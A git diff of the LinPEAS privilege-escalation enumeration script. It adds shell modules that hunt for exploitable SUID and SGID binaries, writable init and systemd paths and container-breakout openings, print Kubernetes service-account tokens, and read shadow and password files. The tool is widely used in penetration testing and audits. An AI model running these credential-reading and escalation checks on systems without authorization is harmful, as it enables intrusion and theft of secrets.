diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ca9105a..b42abb6 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -13,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. ## Specific LinPEAS additions -From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**. +From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*. The new linpeas.sh script will be auto-generated in the PR. ## Specific WinPEAS additions diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index 7fd0282..b751bef 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -65,6 +65,8 @@ common_directory_folders: - /usr - /var +peas_checks: "peass{CHECKS}" + peas_extrasections_markup: "peass{EXTRA_SECTIONS}" peas_finds_markup: "peass{FINDS_HERE}" @@ -2395,6 +2397,21 @@ search: search_in: - common + - name: Jetty + value: + config: + auto_check: True + + files: + - name: "jetty-realm.properties" + value: + bad_regex: ".*" + remove_empty_lines: True + remove_regex: '^#' + type: f + search_in: + - common + - name: Wget value: config: diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index 181d76b..be16c29 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -1,5 +1,6 @@ from .src.peasLoaded import PEASLoaded from .src.linpeasBuilder import LinpeasBuilder +from .src.linpeasBaseBuilder import LinpeasBaseBuilder from .src.yamlGlobals import FINAL_LINPEAS_PATH import os @@ -7,7 +8,14 @@ import stat #python3 -m builder.linpeas_builder def main(): + # Load configuration ploaded = PEASLoaded() + + # Build temporary linpeas_base.sh file + lbasebuilder = LinpeasBaseBuilder() + lbasebuilder.build() + + # Build final linpeas.sh lbuilder = LinpeasBuilder(ploaded) lbuilder.build() lbuilder.write_linpeas(FINAL_LINPEAS_PATH) diff --git a/linPEAS/builder/linpeas_parts/available_software.sh b/linPEAS/builder/linpeas_parts/available_software.sh new file mode 100644 index 0000000..8da4d10 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/available_software.sh @@ -0,0 +1,39 @@ +########################################### +#---------) Available Software (----------# +########################################### + +#-- 1AS) Useful software +print_2title "Useful software" +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +echo "" + +#-- 2AS) Search for compilers +print_2title "Installed Compiler" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" + +if [ "$(command -v pkg 2>/dev/null)" ]; then +print_2title "Vulnerable Packages" +pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" +echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then +print_2title "Brew Installed Packages" +brew list +echo "" +fi + +if [ "$MACPEAS" ]; then +print_2title "Writable Installed Applications" +system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done + +system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done diff --git a/linPEAS/builder/linpeas_parts/container.sh b/linPEAS/builder/linpeas_parts/container.sh new file mode 100644 index 0000000..d249e3a --- /dev/null +++ b/linPEAS/builder/linpeas_parts/container.sh @@ -0,0 +1,95 @@ +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck + +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" + +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" + +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi + +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi + +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi + +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" + +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" + +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi +else + echo_not_found +fi +echo "" + +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" + +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" +fi diff --git a/linPEAS/builder/linpeas_parts/interesting_files.sh b/linPEAS/builder/linpeas_parts/interesting_files.sh new file mode 100644 index 0000000..d1bc7be --- /dev/null +++ b/linPEAS/builder/linpeas_parts/interesting_files.sh @@ -0,0 +1,639 @@ +########################################### +#----------) Interesting files (----------# +########################################### + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + fi +done +echo "" + +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" + +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then 